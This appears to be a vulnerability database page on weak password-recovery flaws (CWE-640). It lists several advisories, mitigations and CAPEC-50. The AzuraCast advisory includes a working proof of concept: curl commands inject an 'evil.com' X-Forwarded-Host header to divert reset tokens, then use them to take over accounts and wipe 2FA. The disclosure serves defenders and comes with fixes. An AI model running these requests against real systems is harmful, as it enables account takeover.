CWE-640
Allowed-with-ReviewWeak Password Recovery Mechanism for Forgotten Password
Abstraction: Base · Status: Incomplete
The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.
393 vulnerabilities reference this CWE, most recent first.
GHSA-GMX4-3375-7G3W
Vulnerability from github – Published: 2022-05-17 02:25 – Updated: 2022-05-17 02:25Remedy AR System Server in BMC Remedy 8.1 SP 2, 9.0, 9.0 SP 1, and 9.1 allows attackers to reset arbitrary passwords via a blank previous password.
{
"affected": [],
"aliases": [
"CVE-2016-2349"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-12-21T22:59:00Z",
"severity": "HIGH"
},
"details": "Remedy AR System Server in BMC Remedy 8.1 SP 2, 9.0, 9.0 SP 1, and 9.1 allows attackers to reset arbitrary passwords via a blank previous password.",
"id": "GHSA-gmx4-3375-7g3w",
"modified": "2022-05-17T02:25:41Z",
"published": "2022-05-17T02:25:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2349"
},
{
"type": "WEB",
"url": "https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA214000000l6kbCAA\u0026type=Solution"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/95075"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1037529"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-GP7M-HV9G-C42R
Vulnerability from github – Published: 2022-05-24 16:55 – Updated: 2024-04-04 01:54TTLock devices do not properly restrict password-reset attempts, leading to incorrect access control and disclosure of sensitive information about valid account names.
{
"affected": [],
"aliases": [
"CVE-2019-12943"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-09-10T21:15:00Z",
"severity": "HIGH"
},
"details": "TTLock devices do not properly restrict password-reset attempts, leading to incorrect access control and disclosure of sensitive information about valid account names.",
"id": "GHSA-gp7m-hv9g-c42r",
"modified": "2024-04-04T01:54:57Z",
"published": "2022-05-24T16:55:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12943"
},
{
"type": "WEB",
"url": "https://www.kth.se/polopoly_fs/1.923564.1568098316!/Vulnerability_Report_TTLock_Password_Reset.pdf"
},
{
"type": "WEB",
"url": "https://www.kth.se/polopoly_fs/1.923564.1568098316%21/Vulnerability_Report_TTLock_Password_Reset.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GV7R-3MR9-H5X8
Vulnerability from github – Published: 2026-05-04 21:17 – Updated: 2026-05-13 13:42Summary
The ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover.
Details
Root Cause 1: Unconditional X-Forwarded-Host Trust
backend/src/Middleware/ApplyXForwarded.php:35-40:
if ($request->hasHeader('X-Forwarded-Host')) {
$hasXForwardedHeader = true;
$xfHost = Types::stringOrNull($request->getHeaderLine('X-Forwarded-Host'), true);
if (null !== $xfHost) {
$uri = $uri->withHost($xfHost);
}
}
There is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.
In the default Docker deployment, nginx's PHP location block (util/docker/web/nginx/azuracast.conf.tmpl:150-171) uses fastcgi_pass with include fastcgi_params. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as HTTP_* parameters. The proxy_params.conf file — which explicitly sets X-Forwarded-For, X-Forwarded-Proto, and X-Forwarded-Port — only applies to proxy_pass directives (websocket and vite dev server), NOT to the fastcgi_pass PHP handler. Therefore, client-supplied X-Forwarded-Host reaches PHP unmodified.
Root Cause 2: Request Host Used for Security-Critical URLs
backend/src/Http/Router.php:53-77 in buildBaseUrl():
$useRequest ??= $settings->prefer_browser_url; // default: true
// ...
if ($useRequest || $baseUrl->getHost() === '') {
$ignoredHosts = ['web', 'nginx', 'localhost'];
if (!in_array($currentUri->getHost(), $ignoredHosts, true)) {
$baseUrl = (new Uri())
->withScheme($currentUri->getScheme())
->withHost($currentUri->getHost())
->withPort($currentUri->getPort());
}
}
With prefer_browser_url = true (the default at backend/src/Entity/Settings.php:109), the request URI host — already poisoned by ApplyXForwarded — is used as the base URL for generating absolute URLs. Even if a base_url is configured in settings, it is overridden by the poisoned request host.
Root Cause 3: Password Reset Generates Absolute URL
backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77:
$router = $request->getRouter();
$url = $router->named(
routeName: 'account:login-token',
routeParams: ['token' => $token],
absolute: true
);
This URL is embedded in the password reset email sent to the victim.
Root Cause 4: Reset Token Wipes 2FA
backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75:
$user->setNewPassword($data['password']);
$user->two_factor_secret = null;
When a ResetPassword token is consumed, the user's 2FA secret is unconditionally destroyed.
PoC
Prerequisites: An AzuraCast instance with a user account (e.g., admin@target.com) that has 2FA enabled. Attacker controls evil.com with a web server that logs incoming requests.
Step 1: Trigger poisoned password reset
curl -X POST https://target.azuracast.example/forgot \
-H "X-Forwarded-Host: evil.com" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "email=admin@target.com"
Expected result: The password reset email sent to admin@target.com contains a URL like:
https://evil.com/login-token/abc123def456...
Step 2: Capture the token
When the victim clicks the link in their email, their browser navigates to https://evil.com/login-token/abc123def456.... The attacker's web server at evil.com captures the full URL path, extracting the token abc123def456....
Step 3: Use token on real instance
# First, GET the reset page to obtain CSRF token
curl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...
# Extract CSRF token from response, then POST new password
curl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "csrf=<extracted_csrf_token>&password=AttackerPassword123"
Result: The victim's password is changed to AttackerPassword123 and their 2FA is destroyed (two_factor_secret = null). The attacker is logged in with full access.
Impact
- Full account takeover of any user account, including administrators, without any prior authentication
- 2FA bypass — the password reset flow unconditionally destroys 2FA configuration, negating its security benefit
- Administrative compromise — if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings
- The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success
Recommended Fix
Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist
In backend/src/Middleware/ApplyXForwarded.php, only apply X-Forwarded-* headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):
// Add trusted proxy check
$trustedProxies = ['127.0.0.1', '::1', 'nginx', 'web'];
$remoteAddr = $request->getServerParams()['REMOTE_ADDR'] ?? '';
if (!in_array($remoteAddr, $trustedProxies, true)) {
return $handler->handle($request);
}
// ... existing X-Forwarded-* processing
Fix 2 (Defense in depth): Use configured base URL for security-critical emails
In ForgotPasswordAction.php, generate the reset URL using the configured base_url setting rather than the request-derived URL:
$router = $request->getRouter();
$url = $router->named(
routeName: 'account:login-token',
routeParams: ['token' => $token],
absolute: true,
// Force use of configured base URL, not request host
);
Or modify Router::buildBaseUrl() to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.
Fix 3 (Defense in depth): Don't wipe 2FA on password reset
In LoginTokenAction.php:75, remove the line $user->two_factor_secret = null;. If 2FA recovery is needed, it should be a separate, explicit flow — not a side effect of password reset.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.23.5"
},
"package": {
"ecosystem": "Packagist",
"name": "azuracast/azuracast"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.23.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42606"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-04T21:17:45Z",
"nvd_published_at": "2026-05-09T20:16:30Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `ApplyXForwarded` middleware unconditionally trusts the client-supplied `X-Forwarded-Host` HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker\u0027s server. The attacker then uses the token on the real instance to reset the victim\u0027s password and destroy their 2FA configuration, achieving full account takeover.\n\n## Details\n\n### Root Cause 1: Unconditional X-Forwarded-Host Trust\n\n`backend/src/Middleware/ApplyXForwarded.php:35-40`:\n```php\nif ($request-\u003ehasHeader(\u0027X-Forwarded-Host\u0027)) {\n $hasXForwardedHeader = true;\n $xfHost = Types::stringOrNull($request-\u003egetHeaderLine(\u0027X-Forwarded-Host\u0027), true);\n if (null !== $xfHost) {\n $uri = $uri-\u003ewithHost($xfHost);\n }\n}\n```\n\nThere is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.\n\nIn the default Docker deployment, nginx\u0027s PHP location block (`util/docker/web/nginx/azuracast.conf.tmpl:150-171`) uses `fastcgi_pass` with `include fastcgi_params`. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as `HTTP_*` parameters. The `proxy_params.conf` file \u2014 which explicitly sets `X-Forwarded-For`, `X-Forwarded-Proto`, and `X-Forwarded-Port` \u2014 only applies to `proxy_pass` directives (websocket and vite dev server), NOT to the `fastcgi_pass` PHP handler. Therefore, client-supplied `X-Forwarded-Host` reaches PHP unmodified.\n\n### Root Cause 2: Request Host Used for Security-Critical URLs\n\n`backend/src/Http/Router.php:53-77` in `buildBaseUrl()`:\n```php\n$useRequest ??= $settings-\u003eprefer_browser_url; // default: true\n\n// ...\nif ($useRequest || $baseUrl-\u003egetHost() === \u0027\u0027) {\n $ignoredHosts = [\u0027web\u0027, \u0027nginx\u0027, \u0027localhost\u0027];\n if (!in_array($currentUri-\u003egetHost(), $ignoredHosts, true)) {\n $baseUrl = (new Uri())\n -\u003ewithScheme($currentUri-\u003egetScheme())\n -\u003ewithHost($currentUri-\u003egetHost())\n -\u003ewithPort($currentUri-\u003egetPort());\n }\n}\n```\n\nWith `prefer_browser_url = true` (the default at `backend/src/Entity/Settings.php:109`), the request URI host \u2014 already poisoned by `ApplyXForwarded` \u2014 is used as the base URL for generating absolute URLs. Even if a `base_url` is configured in settings, it is overridden by the poisoned request host.\n\n### Root Cause 3: Password Reset Generates Absolute URL\n\n`backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77`:\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n routeName: \u0027account:login-token\u0027,\n routeParams: [\u0027token\u0027 =\u003e $token],\n absolute: true\n);\n```\n\nThis URL is embedded in the password reset email sent to the victim.\n\n### Root Cause 4: Reset Token Wipes 2FA\n\n`backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75`:\n```php\n$user-\u003esetNewPassword($data[\u0027password\u0027]);\n$user-\u003etwo_factor_secret = null;\n```\n\nWhen a `ResetPassword` token is consumed, the user\u0027s 2FA secret is unconditionally destroyed.\n\n## PoC\n\n**Prerequisites:** An AzuraCast instance with a user account (e.g., `admin@target.com`) that has 2FA enabled. Attacker controls `evil.com` with a web server that logs incoming requests.\n\n### Step 1: Trigger poisoned password reset\n\n```bash\ncurl -X POST https://target.azuracast.example/forgot \\\n -H \"X-Forwarded-Host: evil.com\" \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"email=admin@target.com\"\n```\n\n**Expected result:** The password reset email sent to `admin@target.com` contains a URL like:\n```\nhttps://evil.com/login-token/abc123def456...\n```\n\n### Step 2: Capture the token\n\nWhen the victim clicks the link in their email, their browser navigates to `https://evil.com/login-token/abc123def456...`. The attacker\u0027s web server at `evil.com` captures the full URL path, extracting the token `abc123def456...`.\n\n### Step 3: Use token on real instance\n\n```bash\n# First, GET the reset page to obtain CSRF token\ncurl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...\n\n# Extract CSRF token from response, then POST new password\ncurl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"csrf=\u003cextracted_csrf_token\u003e\u0026password=AttackerPassword123\"\n```\n\n**Result:** The victim\u0027s password is changed to `AttackerPassword123` and their 2FA is destroyed (`two_factor_secret = null`). The attacker is logged in with full access.\n\n## Impact\n\n- **Full account takeover** of any user account, including administrators, without any prior authentication\n- **2FA bypass** \u2014 the password reset flow unconditionally destroys 2FA configuration, negating its security benefit\n- **Administrative compromise** \u2014 if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings\n- The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success\n\n## Recommended Fix\n\n**Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist**\n\nIn `backend/src/Middleware/ApplyXForwarded.php`, only apply `X-Forwarded-*` headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):\n\n```php\n// Add trusted proxy check\n$trustedProxies = [\u0027127.0.0.1\u0027, \u0027::1\u0027, \u0027nginx\u0027, \u0027web\u0027];\n$remoteAddr = $request-\u003egetServerParams()[\u0027REMOTE_ADDR\u0027] ?? \u0027\u0027;\n\nif (!in_array($remoteAddr, $trustedProxies, true)) {\n return $handler-\u003ehandle($request);\n}\n\n// ... existing X-Forwarded-* processing\n```\n\n**Fix 2 (Defense in depth): Use configured base URL for security-critical emails**\n\nIn `ForgotPasswordAction.php`, generate the reset URL using the configured `base_url` setting rather than the request-derived URL:\n\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n routeName: \u0027account:login-token\u0027,\n routeParams: [\u0027token\u0027 =\u003e $token],\n absolute: true,\n // Force use of configured base URL, not request host\n);\n```\n\nOr modify `Router::buildBaseUrl()` to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.\n\n**Fix 3 (Defense in depth): Don\u0027t wipe 2FA on password reset**\n\nIn `LoginTokenAction.php:75`, remove the line `$user-\u003etwo_factor_secret = null;`. If 2FA recovery is needed, it should be a separate, explicit flow \u2014 not a side effect of password reset.",
"id": "GHSA-gv7r-3mr9-h5x8",
"modified": "2026-05-13T13:42:21Z",
"published": "2026-05-04T21:17:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42606"
},
{
"type": "WEB",
"url": "https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85"
},
{
"type": "PACKAGE",
"url": "https://github.com/AzuraCast/AzuraCast"
},
{
"type": "WEB",
"url": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass"
}
GHSA-GXF7-Q22C-VMRJ
Vulnerability from github – Published: 2026-07-12 12:31 – Updated: 2026-07-12 12:31Capgo before 12.128.2 allows email address changes without requiring current password re-authentication or verification of the existing email address. An attacker with access to a valid session cookie or authenticated browser can change the account email to gain control of account recovery and bypass multi-factor authentication protections.
{
"affected": [],
"aliases": [
"CVE-2026-56308"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-12T12:16:45Z",
"severity": "HIGH"
},
"details": "Capgo before 12.128.2 allows email address changes without requiring current password re-authentication or verification of the existing email address. An attacker with access to a valid session cookie or authenticated browser can change the account email to gain control of account recovery and bypass multi-factor authentication protections.",
"id": "GHSA-gxf7-q22c-vmrj",
"modified": "2026-07-12T12:31:48Z",
"published": "2026-07-12T12:31:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-9px4-w25f-mvm4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56308"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/capgo-insufficient-authentication-in-email-change-endpoint"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-H363-2PF8-49MQ
Vulnerability from github – Published: 2025-01-09 06:30 – Updated: 2025-01-09 06:30A vulnerability, which was classified as critical, has been found in YunzMall up to 2.4.2. This issue affects the function changePwd of the file /app/platform/controllers/ResetpwdController.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2025-0331"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-09T05:15:08Z",
"severity": "MODERATE"
},
"details": "A vulnerability, which was classified as critical, has been found in YunzMall up to 2.4.2. This issue affects the function changePwd of the file /app/platform/controllers/ResetpwdController.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-h363-2pf8-49mq",
"modified": "2025-01-09T06:30:23Z",
"published": "2025-01-09T06:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0331"
},
{
"type": "WEB",
"url": "https://note.zhaoj.in/share/DsijzdQDJSAp"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.290819"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.290819"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.471663"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-HGCM-PH3V-MP4J
Vulnerability from github – Published: 2025-08-20 15:31 – Updated: 2025-08-20 15:31A vulnerability in the password reset workflow of the Touch Lebanon Mobile App 2.20.2 allows an attacker to bypass the OTP reset password mechanism. By manipulating the reset process, an unauthorized user may be able to reset the password and gain access to the account without needing to provide a legitimate authentication factor, such as an OTP. This compromises account security and allows for potential unauthorized access to user data.
{
"affected": [],
"aliases": [
"CVE-2025-50503"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-20T14:15:45Z",
"severity": "HIGH"
},
"details": "A vulnerability in the password reset workflow of the Touch Lebanon Mobile App 2.20.2 allows an attacker to bypass the OTP reset password mechanism. By manipulating the reset process, an unauthorized user may be able to reset the password and gain access to the account without needing to provide a legitimate authentication factor, such as an OTP. This compromises account security and allows for potential unauthorized access to user data.",
"id": "GHSA-hgcm-ph3v-mp4j",
"modified": "2025-08-20T15:31:41Z",
"published": "2025-08-20T15:31:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50503"
},
{
"type": "WEB",
"url": "https://github.com/ksarieddine/disclosures/blob/main/Touch%20Mobile%20Application/2FA%20Bypass%20-%20Touch%20Lebanon.md"
},
{
"type": "WEB",
"url": "https://www.touch.com.lb/autoforms/portal/touch/personal/contentandapps/mobileapp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-HHQ2-W5V4-QXJ2
Vulnerability from github – Published: 2026-01-22 15:31 – Updated: 2026-01-22 15:31A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-1325"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-22T15:16:50Z",
"severity": "MODERATE"
},
"details": "A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-hhq2-w5v4-qxj2",
"modified": "2026-01-22T15:31:32Z",
"published": "2026-01-22T15:31:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1325"
},
{
"type": "WEB",
"url": "https://github.com/LX-LX88/cve/issues/21"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.342301"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.342301"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.736208"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-HM5M-9PHW-V9HQ
Vulnerability from github – Published: 2025-11-10 03:30 – Updated: 2025-11-12 18:31EIP Plus developed by Hundred Plus has a Weak Password Recovery Mechanism vulnerability, allowing unauthenticated remote attacker to predict or brute-force the 'forgot password' link, thereby successfully resetting any user's password.
{
"affected": [],
"aliases": [
"CVE-2025-12866"
],
"database_specific": {
"cwe_ids": [
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-10T03:15:42Z",
"severity": "CRITICAL"
},
"details": "EIP Plus developed by Hundred Plus has a Weak Password Recovery Mechanism vulnerability, allowing unauthenticated remote attacker to predict or brute-force the \u0027forgot password\u0027 link, thereby successfully resetting any user\u0027s password.",
"id": "GHSA-hm5m-9phw-v9hq",
"modified": "2025-11-12T18:31:10Z",
"published": "2025-11-10T03:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12866"
},
{
"type": "WEB",
"url": "https://www.chtsecurity.com/news/20848f61-9db5-44fd-8574-c9d6a54e4010"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/en/cp-139-10491-004b0-2.html"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-10490-2534b-1.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-HP5W-3HXX-VMWF
Vulnerability from github – Published: 2026-04-01 16:08 – Updated: 2026-04-08 18:19Impact
A vulnerability in the password recovery flow could allow an unauthenticated attacker to perform actions on behalf of a user who initiates a password reset.
Users are affected if:
- They are using Payload version < v3.79.1 with any auth-enabled collection using the built-in
forgot-passwordfunctionality.
Patches
Input validation and URL construction in the password recovery flow have been hardened.
Users should upgrade to v3.79.1 or later.
Workarounds
There are no complete workarounds. Upgrading to v3.79.1 is recommended.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "payload"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.79.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@payloadcms/graphql"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.79.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34751"
],
"database_specific": {
"cwe_ids": [
"CWE-472",
"CWE-640"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T16:08:02Z",
"nvd_published_at": "2026-04-01T18:16:31Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nA vulnerability in the password recovery flow could allow an unauthenticated attacker to perform actions on behalf of a user who initiates a password reset.\n\nUsers are affected if:\n\n- They are using Payload version **\u003c v3.79.1** with any auth-enabled collection using the built-in `forgot-password` functionality.\n\n### Patches\n\nInput validation and URL construction in the password recovery flow have been hardened.\n\nUsers should upgrade to **v3.79.1** or later.\n\n### Workarounds\n\nThere are no complete workarounds. Upgrading to **v3.79.1** is recommended.",
"id": "GHSA-hp5w-3hxx-vmwf",
"modified": "2026-04-08T18:19:10Z",
"published": "2026-04-01T16:08:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/payloadcms/payload/security/advisories/GHSA-hp5w-3hxx-vmwf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34751"
},
{
"type": "PACKAGE",
"url": "https://github.com/payloadcms/payload"
},
{
"type": "WEB",
"url": "https://github.com/payloadcms/payload/releases/tag/v3.79.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Payload: Pre-Authentication Account Takeover via Parameter Injection in Password Recovery"
}
GHSA-HPPR-5P45-XR8C
Vulnerability from github – Published: 2023-01-31 18:30 – Updated: 2023-02-08 03:30COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Account takeover. Anyone can reset the password of the admin accounts.
{
"affected": [],
"aliases": [
"CVE-2022-47697"
],
"database_specific": {
"cwe_ids": [
"CWE-522",
"CWE-640"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-31T18:15:00Z",
"severity": "CRITICAL"
},
"details": "COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Account takeover. Anyone can reset the password of the admin accounts.",
"id": "GHSA-hppr-5p45-xr8c",
"modified": "2023-02-08T03:30:25Z",
"published": "2023-01-31T18:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47697"
},
{
"type": "WEB",
"url": "https://github.com/OlivierLaflamme/cve/blob/main/COMFAST/CF-WR623N/unauth_account_takeover"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated.
Mitigation
Do not use standard weak security questions and use several security questions.
Mitigation
Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses.
Mitigation
Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record.
Mitigation
Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism.
Mitigation
Assign a new temporary password rather than revealing the original password.
CAPEC-50: Password Recovery Exploitation
An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.